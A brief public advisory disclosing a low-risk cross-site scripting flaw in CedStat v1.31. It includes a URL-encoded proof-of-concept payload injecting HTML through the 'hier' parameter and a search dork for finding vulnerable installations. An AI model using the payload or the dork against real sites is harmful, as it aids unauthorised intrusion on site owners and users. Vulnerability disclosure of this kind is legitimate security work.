CedStat version 1.31 suffers from a cross site scripting flaw.
7c369dd26b74e39e355b50e8e14bfd987b7e85fe167c1a3e059f17026773fa54
* CedStat v1.31 XSS
* By : sn0oPy
* Risk : low
* site : https://cedtat.free.fr
* exploit :
https://www.target.ma/cedstat/index.php?hier=%3C%68%31%3E%74%65%73%74%65%64%20%62%79%20%73%6E%30%6F%50%79%3C%2F%68%31%3E
Dork :
inurl:"/cedstat/"
* contact : sn0oPy@avenir-geopolitique.net
* greetz : [subzero], https://forums.avenir-geopolitique.net.
reference : https://forums.avenir-geopolitique.net/viewtopic.php?t=2672